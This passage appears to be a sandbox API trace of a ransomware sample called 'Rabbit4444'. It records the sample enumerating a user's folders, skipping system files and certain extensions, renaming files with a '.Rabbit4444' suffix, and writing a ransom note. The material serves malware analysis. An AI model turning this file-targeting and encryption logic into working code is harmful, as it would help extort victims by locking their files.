dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0070.964] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.964] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.964] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.964] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.964] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfed624f3, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xaabc7b4a, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf39f1f48, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.964] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.964] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.964] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.964] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.964] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.964] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf39f1f48, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf39f1f48, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf39fced2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.964] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.964] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.964] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x747c72d3, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x747ed538, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x74813784, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x1053e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504773412", cAlternateFileName="150477~1")) returned 1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2="Rabbit4444.exe") returned -1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2=".") returned 1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2="..") returned 1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2="windows") returned -1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2="bootmgr") returned -1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2="pagefile.sys") returned -1 [0070.964] lstrcmpiW (lpString1="1504773412", lpString2="boot") returned -1 [0070.965] lstrcmpiW (lpString1="1504773412", lpString2="ids.txt") returned -1 [0070.965] lstrcmpiW (lpString1="1504773412", lpString2="NTUSER.DAT") returned -1 [0070.965] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504773412" | out: lpString1="1504773412") returned="1504773412" [0070.965] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1504773412", dwFileAttributes=0x0) returned 1 [0070.965] lstrlenW (lpString="1504773412") returned 10 [0070.965] lstrlenW (lpString="Rabbit4444") returned 10 [0070.965] lstrcmpiW (lpString1="1504773412", lpString2="Rabbit4444") returned -1 [0070.965] lstrlenW (lpString=".dll") returned 4 [0070.965] lstrcmpiW (lpString1="3412", lpString2=".dll") returned 1 [0070.965] lstrlenW (lpString=".lnk") returned 4 [0070.965] lstrcmpiW (lpString1="3412", lpString2=".lnk") returned 1 [0070.965] lstrlenW (lpString=".ini") returned 4 [0070.965] lstrcmpiW (lpString1="3412", lpString2=".ini") returned 1 [0070.965] lstrlenW (lpString=".sys") returned 4 [0070.965] lstrcmpiW (lpString1="3412", lpString2=".sys") returned 1 [0070.965] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1504773412" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\1504773412"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.966] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.966] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16227669843) returned 1 [0070.966] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66878) returned 1 [0070.966] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0070.966] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0070.966] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10840, lpName=0x0) returned 0x27c [0070.967] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10840) returned 0x70000 [0070.972] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1103a8 [0070.972] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0070.972] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1103a8 | out: hHeap=0xe0000) returned 1 [0070.972] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0070.972] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104770 [0070.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0070.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104770 | out: hHeap=0xe0000) returned 1 [0070.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0070.973] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16228363075) returned 1 [0070.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0070.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0070.973] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.974] CloseHandle (hObject=0x27c) returned 1 [0070.974] CloseHandle (hObject=0x260) returned 1 [0070.974] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1504773412.Rabbit4444") returned 164 [0070.974] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1504773412" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\1504773412"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1504773412.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\1504773412.rabbit4444"), dwFlags=0x1) returned 1 [0070.975] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f85044, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xa9f85044, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa9fab273, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x111a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1506430071", cAlternateFileName="150643~1")) returned 1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="Rabbit4444.exe") returned -1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2=".") returned 1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="..") returned 1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="windows") returned -1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="bootmgr") returned -1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="pagefile.sys") returned -1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="boot") returned -1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="ids.txt") returned -1 [0070.975] lstrcmpiW (lpString1="1506430071", lpString2="NTUSER.DAT") returned -1 [0070.975] lstrcpyW (in: lpString1=0x130ec56, lpString2="1506430071" | out: lpString1="1506430071") returned="1506430071" [0070.975] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1506430071", dwFileAttributes=0x0) returned 1 [0070.976] lstrlenW (lpString="1506430071") returned 10 [0070.976] lstrlenW (lpString="Rabbit4444") returned 10 [0070.976] lstrcmpiW (lpString1="1506430071", lpString2="Rabbit4444") returned -1 [0070.976] lstrlenW (lpString=".dll") returned 4 [0070.976] lstrcmpiW (lpString1="0071", lpString2=".dll") returned 1 [0070.976] lstrlenW (lpString=".lnk") returned 4 [0070.976] lstrcmpiW (lpString1="0071", lpString2=".lnk") returned 1 [0070.976] lstrlenW (lpString=".ini") returned 4 [0070.976] lstrcmpiW (lpString1="0071", lpString2=".ini") returned 1 [0070.976] lstrlenW (lpString=".sys") returned 4 [0070.976] lstrcmpiW (lpString1="0071", lpString2=".sys") returned 1 [0070.977] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1506430071" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\1506430071"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.977] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.977] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16228770091) returned 1 [0070.977] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=70048) returned 1 [0070.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0070.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0070.977] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x114a0, lpName=0x0) returned 0x27c [0070.978] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x114a0) returned 0x70000 [0070.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1108d0 [0070.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0070.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1108d0 | out: hHeap=0xe0000) returned 1 [0070.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0070.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104770 [0070.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0070.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104770 | out: hHeap=0xe0000) returned 1 [0070.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0070.985] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16229531684) returned 1 [0070.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0070.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0070.985] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.985] CloseHandle (hObject=0x27c) returned 1 [0070.986] CloseHandle (hObject=0x260) returned 1 [0070.986] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1506430071.Rabbit4444") returned 164 [0070.986] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1506430071" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\1506430071"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\1506430071.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\1506430071.rabbit4444"), dwFlags=0x1) returned 1 [0070.987] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfed624f3, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xfed624f3, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xa06de074, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.987] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.987] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.987] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.987] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.987] lstrlenW (lpString="Rabbit4444") returned 10 [0070.987] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.987] lstrlenW (lpString=".dll") returned 4 [0070.987] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.987] lstrlenW (lpString=".lnk") returned 4 [0070.988] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.988] lstrlenW (lpString=".ini") returned 4 [0070.988] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.988] lstrlenW (lpString=".sys") returned 4 [0070.988] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.988] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfed624f3, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xfed624f3, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xa06de074, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.988] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.988] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.988] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.988] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.988] lstrlenW (lpString="Rabbit4444") returned 10 [0070.988] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.988] lstrlenW (lpString=".dll") returned 4 [0070.988] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.988] lstrlenW (lpString=".lnk") returned 4 [0070.988] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.989] lstrlenW (lpString=".ini") returned 4 [0070.989] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.989] lstrlenW (lpString=".sys") returned 4 [0070.989] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.989] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfed624f3, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xfed624f3, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xa06de074, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.989] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0070.989] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.989] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.990] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.990] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.991] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.991] CloseHandle (hObject=0x260) returned 1 [0070.991] CloseHandle (hObject=0x228) returned 1 [0070.991] GetCurrentThreadId () returned 0xd98 [0070.991] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0070.991] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292" [0070.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dcc0 | out: hHeap=0xe0000) returned 1 [0070.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0070.991] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292" [0070.992] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\" [0070.992] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\.BFC0E91B00AE8A0620D3" [0070.992] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\243292\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.998] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0071.001] FlushFileBuffers (hFile=0x228) returned 1 [0071.001] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0071.002] CloseHandle (hObject=0x228) returned 1 [0071.002] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292") returned 142 [0071.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x235399a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x25417c04, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xf3a41ec4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0071.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.002] 